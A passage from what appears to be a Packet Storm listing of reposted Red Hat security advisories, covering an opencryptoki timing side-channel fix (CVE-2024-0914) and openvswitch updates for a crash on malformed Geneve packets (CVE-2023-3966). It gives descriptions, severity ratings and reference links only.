severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The opencryptoki packages contain version 2.11 of the PKCS#11 API, implemented for IBM Cryptocards, such as IBM 4764 and 4765 crypto cards. These packages includes support for the IBM 4758 Cryptographic CoProcessor (with the PKCS#11 firmware loaded), the IBM eServer Cryptographic Accelerator (FC 4960 on IBM eServer System p), the IBM Crypto Express2 (FC 0863 or FC 0870 on IBM System z), and the IBM CP Assist for Cryptographic Function (FC 3863 on IBM System z). The opencryptoki packages also bring a software token implementation that can be used without any cryptographic hardware. These packages contain the Slot Daemon (pkcsslotd) and general utilities.Security Fix(es):* opencryptoki: timing side-channel in handling of RSA PKCS#1 v1.5 padded ciphertexts (Marvin) (CVE-2024-0914)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0914References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2260407

Red Hat Security Advisory 2024-1239-03

Red Hat Security Advisory 2024-1235-03 - An update for openvswitch3.1 is now available for Fast Datapath for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1235.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: openvswitch3.1 security updateAdvisory ID:        RHSA-2024:1235-03Product:            Fast DatapathAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1235Issue date:         2024-03-07Revision:           03CVE Names:          CVE-2023-3966====================================================================Summary: An update for openvswitch3.1 is now available for Fast Datapath for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic.Security Fix(es):* openvswsitch: ovs-vswitch fails to recover after malformed geneve metadata packet (CVE-2023-3966)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3966References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2178363https://issues.redhat.com/browse/FD-3266https://issues.redhat.com/browse/FDP-310

Red Hat Security Advisory 2024-1235-03

Red Hat Security Advisory 2024-1234-03 - An update for openvswitch2.17 is now available for Fast Datapath for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1234.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: openvswitch2.17 security updateAdvisory ID:        RHSA-2024:1234-03Product:            Fast DatapathAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1234Issue date:         2024-03-07Revision:           03CVE Names:          CVE-2023-3966====================================================================Summary: An update for openvswitch2.17 is now available for Fast Datapath for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic.Security Fix(es):* openvswsitch: ovs-vswitch fails to recover after malformed geneve metadata packet (CVE-2023-3966)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3966References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2178363https://issues.redhat.com/browse/FD-3267https://issues.redhat.com/browse/FDP-308

Tag

#linux